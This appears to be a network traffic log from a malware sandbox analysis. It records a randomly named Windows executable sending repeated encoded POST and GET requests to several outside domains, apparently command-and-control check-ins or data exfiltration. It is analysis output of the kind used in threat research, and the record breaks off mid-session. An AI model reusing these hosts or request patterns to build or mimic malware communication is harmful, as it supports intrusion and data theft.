                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=d4858c7a9e6284b60a32b401e222b366|173.254.250.78|1730260600|1730260600|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=173.254.250.78; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 140


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.54998818.141.10.107801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:42.058242083 CET750OUTPOST /exug/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.fieldelse.net
                                                                    Origin: http://www.fieldelse.net
                                                                    Referer: http://www.fieldelse.net/exug/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 65 57 42 73 6c 79 58 50 75 6a 59 79 62 48 63 61 53 4d 31 47 4b 4a 57 70 6a 47 71 30 62 46 6c 32 52 57 61 70 2f 43 32 68 35 34 78 43 55 71 57 52 44 75 34 5a 66 31 6c 55 48 6d 45 62 5a 73 4d 62 53 44 41 71 72 54 78 51 63 6e 65 6f 45 31 4a 59 42 74 4e 67 41 44 42 4a 6a 67 62 74 4e 71 4b 79 79 30 56 58 6c 4b 32 6d 5a 62 66 77 47 4b 57 56 75 35 6d 79 70 67 48 37 67 41 79 59 4d 30 50 4f 55 32 4c 42 54 47 38 4d 4d 6d 51 67 65 30 6b 52 51 59 36 69 46 63 65 4b 2f 6d 57 55 78 31 6d 34 4e 74 73 53 64 74 66 62 31 70 30 30 71 77 4b 4b 61 77 6a 61 33 76 4e 4a 6f 52 69 38 68 7a 75 33 2f 6c 56 51 42 56 6a 68 43 71 71 4a 4b 5a 32 75 36 47 57 75 37 6b 32 43 4c 57 37 6c
                                                                    Data Ascii: vxPD=eWBslyXPujYybHcaSM1GKJWpjGq0bFl2RWap/C2h54xCUqWRDu4Zf1lUHmEbZsMbSDAqrTxQcneoE1JYBtNgADBJjgbtNqKyy0VXlK2mZbfwGKWVu5mypgH7gAyYM0POU2LBTG8MMmQge0kRQY6iFceK/mWUx1m4NtsSdtfb1p00qwKKawja3vNJoRi8hzu3/lVQBVjhCqqJKZ2u6GWu7k2CLW7l
                                                                    Oct 30, 2024 04:56:43.473562956 CET724INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:56:43 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=9f5c013b22524f3d6982fc09d6c78c45|173.254.250.78|1730260603|1730260603|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=173.254.250.78; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 140


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.54998918.141.10.107801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:44.713918924 CET1767OUTPOST /exug/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.fieldelse.net
                                                                    Origin: http://www.fieldelse.net
                                                                    Referer: http://www.fieldelse.net/exug/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 65 57 42 73 6c 79 58 50 75 6a 59 79 62 48 63 61 53 4d 31 47 4b 4a 57 70 6a 47 71 30 62 46 6c 32 52 57 61 70 2f 43 32 68 35 34 4a 43 55 59 65 52 4d 74 51 5a 65 31 6c 55 59 57 46 63 5a 73 4d 6a 53 44 49 6d 72 54 4e 6d 63 6c 32 6f 46 54 64 59 41 63 4e 67 4f 44 42 4a 2b 51 62 57 41 4b 4b 72 79 77 4a 54 6c 4b 6d 6d 5a 62 66 77 47 4d 61 56 70 6f 6d 79 72 67 48 34 6e 41 79 63 49 30 50 32 55 32 54 2f 54 47 77 79 4d 58 77 67 5a 56 59 52 64 4b 69 69 61 73 65 49 78 47 57 48 78 30 61 64 4e 74 77 65 64 74 43 77 31 70 4d 30 72 30 36 63 44 79 2f 33 32 2b 68 78 34 44 4b 38 39 48 6d 4b 39 45 56 41 4f 46 4c 53 65 36 79 45 4e 64 71 45 34 46 50 66 67 77 4b 4a 42 7a 61 66 6b 74 55 46 2f 58 72 73 62 33 49 75 50 70 64 7a 39 49 54 61 6d 59 77 48 71 48 66 44 44 6b 37 31 51 75 7a 43 6b 51 34 57 63 4f 58 55 42 4f 32 68 71 37 35 4a 5a 6b 33 33 4b 35 35 6b 5a 38 57 65 4e 4d 77 69 44 43 78 6a 58 5a 6d 36 45 30 54 41 35 58 47 54 53 2b 6d 7a 76 2f 50 79 33 62 54 48 41 63 6e 74 59 53 6a 2f 6d 46 6b 33 65 41 75 2b 74 [TRUNCATED]
                                                                    Data Ascii: vxPD=eWBslyXPujYybHcaSM1GKJWpjGq0bFl2RWap/C2h54JCUYeRMtQZe1lUYWFcZsMjSDImrTNmcl2oFTdYAcNgODBJ+QbWAKKrywJTlKmmZbfwGMaVpomyrgH4nAycI0P2U2T/TGwyMXwgZVYRdKiiaseIxGWHx0adNtwedtCw1pM0r06cDy/32+hx4DK89HmK9EVAOFLSe6yENdqE4FPfgwKJBzafktUF/Xrsb3IuPpdz9ITamYwHqHfDDk71QuzCkQ4WcOXUBO2hq75JZk33K55kZ8WeNMwiDCxjXZm6E0TA5XGTS+mzv/Py3bTHAcntYSj/mFk3eAu+t6D3isc0U267koFSFXdNWOcBPFkQMI1rjORkuUCHk8iyv54oubD59RDklKtvRCxOOMV5zMtrD65r5Ne1w9kFx9tcGTp+o39UuRGJXMOO8p3YNpwHxtOvAz6f7aWylWoxHih6vRMSi7lv+WtrDdEJWcR8DKLjTJlt9SPDUK+/vFyP/Dy4P9pJWZn5jRmPwEt7bOvrmCTuPpbewhT4v9yBZKvzORCF/XzyICg+rCqf1QWpxKjB/d7yD6d1fcyjDQpT6HVkWOTkAG3CNQbYzFzBccs+/g9HRZ+dXZORxwFhtiLjNxa8botiyQRWEjxBf1Jn20aBQRdxrPCciNPTF5exhyEaoM0opTR3SiMfB5/FeLxcMtUMwGj/foZNK8/Oh2THCaSh01aeAtb5U93ZWwCt9iuKxnUjQbrPT1MH0CEA9vPIUkX/umHbwSmLw7ViaIe0gJGN37xuEhIvu0MPlbwxghopr9NIgSujxQ+K35XfQpMYKfVlXaZVMNNgG/lhYp0i4vshaVyKEVei8AsV8eYu9TF+5PVUYChnaVLLgpdMSB502j0KbYNI4c229CJ6xXT/VLHzvkXD9J0uZ713jsNXkZsDbcqiFWP5NQVA87AFRU66Y0ceB/QqOn0OH3fhzeJccmXAYunbA+GU1L1sTDCD7mL7LJ6agNKypCq [TRUNCATED]
                                                                    Oct 30, 2024 04:56:46.086023092 CET724INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:56:45 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=539711010bd5b06c712e8cd95e404dae|173.254.250.78|1730260605|1730260605|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=173.254.250.78; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 140


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.54999018.141.10.107801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:47.395813942 CET472OUTGET /exug/?7JH=bvSPlHnHQ4A&vxPD=TUpMmFq2kwIXLFstS9tSAK6sg3+MTXwTelyO0iz++Kl2PamQN8cgWwJpHGB2BYM6TBg0ujJhQFrOEWIIA95gJhU2w3nrLf6Fr1xVloq0NNPRZ4qmm6KGpgvxijzqAjWBDA== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.fieldelse.net
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:56:48.754000902 CET674INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:56:48 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=; path=/; domain=www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: btst=82bcf80ecf5a77f008247d52621d58a6|173.254.250.78|1730260608|1730260608|0|1|0; path=/; domain=.fieldelse.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                    Set-Cookie: snkz=173.254.250.78; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.549991197.189.237.186801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:54.567487001 CET745OUTPOST /iv79/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.patioprojex.africa
                                                                    Origin: http://www.patioprojex.africa
                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 58 61 75 4f 45 45 4a 35 49 4c 45 33 34 39 4b 62 72 68 69 7a 33 57 6e 67 42 69 43 35 4a 79 75 37 39 39 50 6f 48 34 69 54 43 2b 57 2b 33 51 61 36 79 6f 73 57 42 52 53 6e 51 4c 31 50 42 73 6a 38 58 58 56 71 6b 53 34 67 54 35 35 61 61 76 37 4e 42 58 71 70 49 7a 68 67 5a 6a 36 36 4f 36 64 55 31 64 7a 58 50 32 45 4e 2b 55 59 32 2b 46 6d 6e 4b 70 34 58 77 6c 68 75 2b 77 6b 73 7a 52 74 59 36 72 6f 33 64 5a 70 59 32 77 47 30 52 4c 76 48 68 7a 34 6b 37 42 61 61 72 73 54 73 71 72 5a 31 53 4f 52 4b 47 35 41 58 43 35 53 79 49 43 65 6a 61 56 2f 4b 63 78 77 77 37 4a 33 75 49 73 37 44 51 6d 66 55 36 6d 34 3d
                                                                    Data Ascii: vxPD=XauOEEJ5ILE349Kbrhiz3WngBiC5Jyu799PoH4iTC+W+3Qa6yosWBRSnQL1PBsj8XXVqkS4gT55aav7NBXqpIzhgZj66O6dU1dzXP2EN+UY2+FmnKp4Xwlhu+wkszRtY6ro3dZpY2wG0RLvHhz4k7BaarsTsqrZ1SORKG5AXC5SyICejaV/Kcxww7J3uIs7DQmfU6m4=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.549992197.189.237.186801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:57.103473902 CET765OUTPOST /iv79/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.patioprojex.africa
                                                                    Origin: http://www.patioprojex.africa
                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 58 61 75 4f 45 45 4a 35 49 4c 45 33 35 5a 32 62 70 41 69 7a 77 32 6e 2f 4f 43 43 35 44 53 75 33 39 39 4c 6f 48 37 75 44 44 4d 79 2b 33 77 71 36 31 64 4d 57 47 52 53 6e 45 62 31 4f 4c 4d 6a 7a 58 58 59 5a 6b 58 51 67 54 35 39 61 61 72 33 4e 41 68 69 75 4f 6a 68 2b 54 7a 36 34 42 61 64 55 31 64 7a 58 50 32 52 57 2b 55 77 32 69 6b 57 6e 4c 4d 4d 55 73 31 68 74 35 77 6b 73 33 52 74 63 36 72 6f 52 64 63 41 31 32 7a 2b 30 52 4b 66 48 6c 79 34 6e 69 52 62 54 31 63 53 4a 72 75 41 73 49 50 64 6e 47 62 49 55 43 37 65 58 45 55 7a 4a 41 33 33 69 50 52 63 49 72 61 2f 5a 5a 63 61 71 4b 46 50 6b 6b 78 74 6c 36 31 42 7a 52 6a 72 58 35 54 58 32 31 64 46 55 2b 73 65 54
                                                                    Data Ascii: vxPD=XauOEEJ5ILE35Z2bpAizw2n/OCC5DSu399LoH7uDDMy+3wq61dMWGRSnEb1OLMjzXXYZkXQgT59aar3NAhiuOjh+Tz64BadU1dzXP2RW+Uw2ikWnLMMUs1ht5wks3Rtc6roRdcA12z+0RKfHly4niRbT1cSJruAsIPdnGbIUC7eXEUzJA33iPRcIra/ZZcaqKFPkkxtl61BzRjrX5TX21dFU+seT


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.549993197.189.237.186801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:59.650847912 CET1782OUTPOST /iv79/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.patioprojex.africa
                                                                    Origin: http://www.patioprojex.africa
                                                                    Referer: http://www.patioprojex.africa/iv79/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 58 61 75 4f 45 45 4a 35 49 4c 45 33 35 5a 32 62 70 41 69 7a 77 32 6e 2f 4f 43 43 35 44 53 75 33 39 39 4c 6f 48 37 75 44 44 4d 36 2b 32 44 53 36 32 37 45 57 48 52 53 6e 62 72 31 4c 4c 4d 6a 71 58 58 77 56 6b 58 55 76 54 37 31 61 62 4f 72 4e 48 54 4b 75 48 6a 68 2b 64 6a 36 31 4f 36 63 57 31 64 69 65 50 32 42 57 2b 55 77 32 69 6d 4f 6e 4d 5a 34 55 75 31 68 75 2b 77 6b 67 7a 52 74 34 36 6f 5a 6b 64 63 4d 44 6a 53 65 30 53 71 50 48 6a 51 51 6e 71 52 62 52 30 63 53 72 72 75 45 4a 49 50 42 64 47 61 4e 2f 43 34 2b 58 47 31 32 2f 54 79 58 4f 62 41 34 51 6b 35 76 31 5a 59 47 64 4a 58 48 51 35 54 35 36 31 57 49 61 47 6d 48 49 74 77 75 44 30 4d 51 62 2f 4c 50 76 62 47 77 65 4f 31 41 4d 42 75 54 4c 2f 62 32 78 57 56 53 35 33 51 39 42 79 4a 69 64 68 49 67 74 53 75 46 42 33 4e 5a 41 2f 6e 38 74 4f 59 73 64 79 61 55 4e 64 2b 45 31 31 6e 68 2b 62 65 6f 75 54 35 59 58 38 4d 57 76 77 76 76 34 66 77 41 78 63 41 71 76 66 73 4d 32 31 63 4e 48 77 36 57 31 68 4c 58 53 75 4f 47 4b 4a 78 50 39 78 49 6f 45 64 [TRUNCATED]
                                                                    Data Ascii: vxPD=XauOEEJ5ILE35Z2bpAizw2n/OCC5DSu399LoH7uDDM6+2DS627EWHRSnbr1LLMjqXXwVkXUvT71abOrNHTKuHjh+dj61O6cW1dieP2BW+Uw2imOnMZ4Uu1hu+wkgzRt46oZkdcMDjSe0SqPHjQQnqRbR0cSrruEJIPBdGaN/C4+XG12/TyXObA4Qk5v1ZYGdJXHQ5T561WIaGmHItwuD0MQb/LPvbGweO1AMBuTL/b2xWVS53Q9ByJidhIgtSuFB3NZA/n8tOYsdyaUNd+E11nh+beouT5YX8MWvwvv4fwAxcAqvfsM21cNHw6W1hLXSuOGKJxP9xIoEdCyeSxqpFqBaoVR6nvpcXfliBTirsUoXLk4j/za+TuqsEWtmuG9zsXZh1YfOdM+umvRYe4fs3mh3vOJ1wsG/RZUjDY6RKjXPvoqbhwCf6Ek7K509IDpVD1rAb8PBPTIRqHZsaJT3d0109lQ6DoSbwp47VaC8pnrrFxhKE6xxHSWu7mNGkyvGjrcUt4ESWTfC77KhnU0udm4O/p44mOHrHG9b4mFKSTeOWrAY9i0CzeDyQT+I1rmwqY67R70esieavq/pNvw5XhyqelX9iWje88rySGG43BdRm9u0H9FiM5i6/OkSxuc7L/pJz05l6aFDLowoduxuNcKhJre8dTbooh+LThicdOMdef8dpXEjGioGYTNBDm7tP5JkR318Yiq9KcJU6xqtwI64ba9/wJwiuwx3A5h8RdcyWt0ieArrel8INJTjcMuFgiPJCUSTF3D919B5wON7xYjpxVITUDbrgz2bAUUSNY06XCpinC5/vKKe8UJNa3NMkL/xmo9qvu0uU/VPLEy5iGGJbaPjXqamkpydWn33Pi4rUc4BdAKmYugv12NfhlxQimymMY46iQsRDf/0Y3ZYaXSy/z9eURkNET8BzsrNULUr/zZCWnLIrFWXM06LVIXQiHV/ipU3g4coziiFosyc36fa5AQiCvNw+pTwjfhqPDnjhem [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.549994197.189.237.186801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:57:02.195517063 CET477OUTGET /iv79/?vxPD=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.patioprojex.africa
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:57:04.018161058 CET507INHTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 30 Oct 2024 03:57:03 GMT
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.24
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://patioprojex.africa/iv79/?vxPD=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&7JH=bvSPlHnHQ4A
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.549995162.0.238.246801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:57:30.031331062 CET721OUTPOST /dbbh/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.huyven.xyz
                                                                    Origin: http://www.huyven.xyz
                                                                    Referer: http://www.huyven.xyz/dbbh/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 6f 59 4f 6d 50 2f 4e 53 47 69 46 70 4c 42 57 33 6b 68 62 4f 51 41 2f 4c 49 30 62 62 65 4b 73 39 59 62 33 73 6d 76 53 77 71 5a 52 49 43 6f 31 67 35 43 38 39 48 7a 54 50 73 42 77 4d 53 45 65 4d 61 33 31 74 6e 33 4c 46 56 38 42 47 38 69 59 4c 67 36 39 32 4b 5a 34 30 56 66 6d 55 4a 53 66 6b 49 2b 6d 4b 38 4a 35 64 49 74 6d 34 49 71 38 7a 58 32 72 78 56 41 37 36 6a 2f 44 56 71 6d 38 69 52 6c 67 70 61 75 56 68 35 73 6e 52 69 2b 4c 6d 2f 59 4c 75 52 54 51 41 47 55 58 59 6c 6e 68 53 38 62 76 74 6f 47 6c 30 77 78 6d 52 46 45 6c 48 4e 4d 6b 33 73 76 53 47 79 30 77 68 49 33 6d 77 44 4d 55 36 50 46 38 3d
                                                                    Data Ascii: vxPD=oYOmP/NSGiFpLBW3khbOQA/LI0bbeKs9Yb3smvSwqZRICo1g5C89HzTPsBwMSEeMa31tn3LFV8BG8iYLg692KZ40VfmUJSfkI+mK8J5dItm4Iq8zX2rxVA76j/DVqm8iRlgpauVh5snRi+Lm/YLuRTQAGUXYlnhS8bvtoGl0wxmRFElHNMk3svSGy0whI3mwDMU6PF8=
                                                                    Oct 30, 2024 04:57:30.704444885 CET533INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:57:30 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.549996162.0.238.246801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:57:32.586517096 CET741OUTPOST /dbbh/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.huyven.xyz
                                                                    Origin: http://www.huyven.xyz
                                                                    Referer: http://www.huyven.xyz/dbbh/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
